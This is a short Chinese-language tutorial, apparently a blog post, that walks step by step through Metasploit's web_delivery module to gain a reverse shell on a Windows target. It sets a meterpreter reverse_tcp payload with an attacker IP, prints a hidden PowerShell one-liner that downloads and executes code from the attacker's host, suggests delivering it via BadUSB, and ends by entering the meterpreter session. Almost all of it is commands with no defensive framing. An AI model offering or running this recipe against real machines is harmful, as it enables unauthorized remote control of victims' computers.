1.第一步:使用msf的脚本后门模块
use exploit/multi/script/web_delivery
2.第二步:使用 show opinion 查看需要使用的相关参数
show options 

可看到下列参数:需要选择的是target、payload选项(包含ip以及端口)、uripath等


3.第三步:查看target 包含多少可选的目标选项,使用以下参数查看
show targets 

可看到下列选项包含:Python/PHP/powershell


4.第四步:设置target 我们这里选择2 —-powershell的这脚本
set target 2 
5.第五步:设置payload选项,设置windows(powershell)反弹shell链接
set payload windows/meterpreter/reverse_tcp
6.第六步:设置攻击者-端口默认是:4444,也可以更改 我这里就不设置了,直接用默认的端口
set LHOST 192.168.1.101 
7.第七步:设置uripath 路径 设置为根目录—– ‘/‘
set URIPATH /
8.第八步:执行后门
exploit / 

9.第九步:将代码复制目标机器上cmd 下运行——-利用思路可以用到“Badusb”等多种思路
powershell.exe -nop -w hidden -c $O=new-object net.webclient;$O.proxy=[Net.WebRequest]::GetSystemWebProxy();$O.Proxy.Credentials[Net.CredentialCache]::DefaultCredentials;IEX $O.downloadstring(‘http192。168。1。101:8080/‘); /度娘真的疯了 内网ip都吞
10.可看到反弹shell
session -i //查看回话ID 获取回话进入meterpreter 回话